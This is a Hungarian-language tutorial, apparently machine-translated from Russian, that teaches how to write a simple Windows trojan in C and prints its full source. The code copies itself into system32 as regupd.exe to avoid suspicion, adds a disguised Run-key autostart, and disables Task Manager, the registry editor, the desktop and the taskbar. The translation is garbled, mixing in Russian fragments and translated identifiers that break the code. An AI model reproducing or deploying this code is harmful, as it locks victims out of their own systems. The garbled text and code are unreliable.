Írás egy egyszerű trójai, vr-line - ingyenes e-zine az összes
Hello mindenkinek. Most elmondom, hogyan kell írni egy trójai. Bár tekinthető trójai malware, és ebben a cikkben megmutatom, példát egyértelműen igazi kemény kisalkalmazások (akkor is, ha a képregény, a viccet egy nagyon rossz) alapján ez az anyag, és a képzelet, akkor ezt szinte ártalmatlan vicc programot.
Mielőtt elkezdenénk, szeretném elmondani, hogy nem vállalnak felelősséget, hogyan és milyen célból fogja használni az anyagot. Ugyanakkor szeretném felhívni a figyelmet arra a tényre, hogy a büntető törvénykönyv tiltja az írás és az ilyen szoftver.
Egy másik nagy hátrány a program, hogy minden normális antivírus azt észleli és blokkolja a hozzáférést a rendszerhez. De ha beszélünk a régi barátnője, ő sem tudja, hogy mi az anti-vírus, és mit kell csinálni vele.
Általában a program nem tökéletes, és alig írni ezt a cuccot, de valaki tudott hűlni hasznos. Következő, azt javaslom, programkód részletes leírását.
int APIENTRY _tWinMain (HINSTANCE HINSTANCE,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
vissza 0;
>
Mindent! Most már készen állunk, hogy írjon kódot!
Először is meg kell, hogy tartalmazza a header file windows.h. Ez tartalmazta a leírást minden API - függvények, makrók és megosztott összes adattípusok által használt különböző funkciók és alrendszerek. Szintén a windows.h fájl köti windef.h fájl, amely meghatározza az állandó MAX_PATH (it fogjuk használni később). Az állandó értéke attól függ, hogy az operációs rendszer és az FS (File System). WinXP NTFS, az érték 260 Emellett windows.h nekünk nincs semmi többet csatlakoztatásához szükséges, így az átmenet a funkció main (). Alapvetően, a program áll csak a funkció main (), így dobja a kód egyszerre haszontalan. Meg fogom magyarázni az összes kódot a részek, és a végén ezt a részt fogom dobni a kódot, hogy amennyiben azt kap.
Hozzáadás a kódot a nyitó zárójel ( <) и оператором return следующий код:
char rendszer [MAX_PATH];
char pathtofile [MAX_PATH];
GetModuleFileName (HModule, pathtofile, sizeof (pathtofile));
GetSystemDirectory (rendszer, sizeof (rendszer));
GetModuleHandle funkciót egy NULL paraméter visszaadja a fájl leíró létrehozásához használt hívó folyamat. GetModuleFileName funkciót ír változó pathtofile elérési utat leíró HModule. Most pathtofile változó tárolja az utat a mi fájlt. Továbbra is a számunkra, hogy dobja el a fájlt a system32 mappában.
Úgy vélem, hogy a jelentése a következő funkciók egyértelmű a cím: bemásolja az utat a system32 mappát egy változó rendszer. Strcat funkció, ehhez hozzátesszük, hogy a változó rendszer (amely tárolja az utat a system32 mappában) «\\ regupd.exe» húr ez lesz a neve a mi példa program a mappában a rendszer. Ez úgy történik, abban az esetben a hirtelen áldozat megy ezen a helyen, nem tudta azonnal megtalálja a „vírus”. Valld be, regupd fájl kevésbé okoz gyanú mint MyVirus fájlt.
Fordítsuk le a programot, és menj a system32 mappában. Itt láthatjuk az újonnan létrehozott fájl. Most, hogy végre a fájlt induláskor, és nem valami csúnya. Az első probléma megoldódott az alábbiak szerint:
HKEY HKEY;
RegOpenKeyEx (HKEY_LOCAL_MACHINE "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run", 0, KEY_SET_VALUE, -hKey);
RegSetValueEx (HKEY, "Registry Update", 0, REG_SZ, (const unsigned char *) rendszer, sizeof (rendszer));
RegCloseKey (HKEY);
Az első sor kódot kijelenti egy változó típusú HKEY. Ez a típus leíró egy registry kulcsot. A fájl windef.h ilyen definíciója
typedef FOGANTYÚ HKEY
RegCloseKey () függvény bezárja a kulcs leíró.
Ez minden, az első feladat, rájöttünk: megvan, hogy bemutassuk a fájlt induláskor. Továbbra is felér valami vicc.
Amit jött, már tudja. Most én csak megmutatom, hogyan valósítható meg. Először is, egy kis háttér anyaga:
Betiltani a dob Task Manager, kövesse az alábbi lépéseket:
Feladatkezelő tilalmat biztosítanunk kell, hogy a folyamat nem tudta megölni a Task Manager. Bár ez lehet ölni használatával tasklist - taskkill, nem mindenki ismeri ezt a módszert.
Itt a kód, amely megvalósítja az összes fenti, és még egy dolog:
Duplaszóértéket = 1;
RegOpenKeyEx (HKEY_CURRENT_USER "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ \\ házirendje System", 0, KEY_ALL_ACCESS, -hKey);
RegSetValueEx (HKEY, "DisableTaskMgr", NULL, REG_DWORD, (BYTE *) - értéket, sizeof (DWORD));
RegCloseKey (HKEY);
RegOpenKeyEx (HKEY_CURRENT_USER "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ \\ házirendje System", 0, KEY_ALL_ACCESS, -hKey);
RegSetValueEx (HKEY, "DisableRegistryTools", NULL, REG_DWORD, (BYTE *) - értéket, sizeof (DWORD));
RegCloseKey (HKEY);
RegOpenKeyEx (HKEY_CURRENT_USER "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ \\ házirendje Explorer", 0, KEY_ALL_ACCESS, -hKey);
RegSetValueEx (HKEY, "NoDesktop", NULL, REG_DWORD, (BYTE *) - értéket, sizeof (DWORD));
RegCloseKey (HKEY);
hTaskBar = FindWindow ( "Shell_TrayWnd", NULL);
EnableWindow (hTaskBar, érték!);
Minden világos, kivéve az utolsó 6-szálakat. Az első három a hat tiszta asztalon.
És akkor azt látjuk, a fogantyú a tálcára, és ez (a tálca nem érhető el).
Itt van a teljes kód:
#include "stdafx.h"
#include "vir.h"
int APIENTRY _tWinMain (HINSTANCE HINSTANCE,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
char rendszer [MAX_PATH];
char pathtofile [MAX_PATH];
GetModuleFileName (GetHModule, pathtofile, sizeof (pathtofile));
GetSystemDirectory (rendszer, sizeof (rendszer));
RegOpenKeyEx (HKEY_LOCAL_MACHINE "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run", 0, KEY_SET_VALUE, -hKey);
RegSetValueEx (HKEY, "Registry Update", 0, REG_SZ, (const unsigned char *) rendszer, sizeof (rendszer));
RegOpenKeyEx (HKEY_CURRENT_USER "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ \\ házirendje System", 0, KEY_ALL_ACCESS, -hKey);
RegSetValueEx (HKEY, "DisableTaskMgr", NULL, REG_DWORD, (BYTE *) - értéket, sizeof (DWORD));
RegCloseKey (HKEY);
RegOpenKeyEx (HKEY_CURRENT_USER "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ \\ házirendje System", 0, KEY_ALL_ACCESS, -hKey);
RegSetValueEx (HKEY, "DisableRegistryTools", NULL, REG_DWORD, (BYTE *) - értéket, sizeof (DWORD));
RegCloseKey (HKEY);
RegOpenKeyEx (HKEY_CURRENT_USER "Software \\ Microsoft \\ Windows \\ CurrentVersion \\ \\ házirendje Explorer", 0, KEY_ALL_ACCESS, -hKey);
RegSetValueEx (HKEY, "NoDesktop", NULL, REG_DWORD, (BYTE *) - értéket, sizeof (DWORD));
RegCloseKey (HKEY);
hTaskBar = FindWindow ( "Shell_TrayWnd", NULL);
EnableWindow (hTaskBar, érték!);
Általában a trójaiak - a legegyszerűbb formája malware, amelynek komplexitása kizárólag attól függ, bonyolítja a valódi probléma, és elfedő ágensek. Ennek maszkírozószer neveztük RegUpd és registry létre opció Registry Update, hogy a program felkelti kevesebb gyanút. De hogy az igazi probléma, akkor mindent át kell adni a képzelet, el lehet képzelni, hogy mi lesz, hogy a trójaiak.
Mindez a leckét vége. Remélem, hogy valaki jól jön ez az anyag. És bár tudja használni tetszőleges sorrendben, akkor jobb, ha használja egy ártalmatlan tréfa.
Írta: Sergei Dubovik aka sd.
Idézet Ha valaki hirtelen akar kipróbálni
Próbáld futtatni vin7, sok utalás a nyilvántartásba, azt hiszem, ez a dolog (a trójai nem merik nevezni) nem valami, ami nem Probet Windu, és további vírusellenes hitelesítési szakasz lesz kitéve!
PS - de általában ez nem egy trójai, akkor a jellemzői a hagyományos féreg!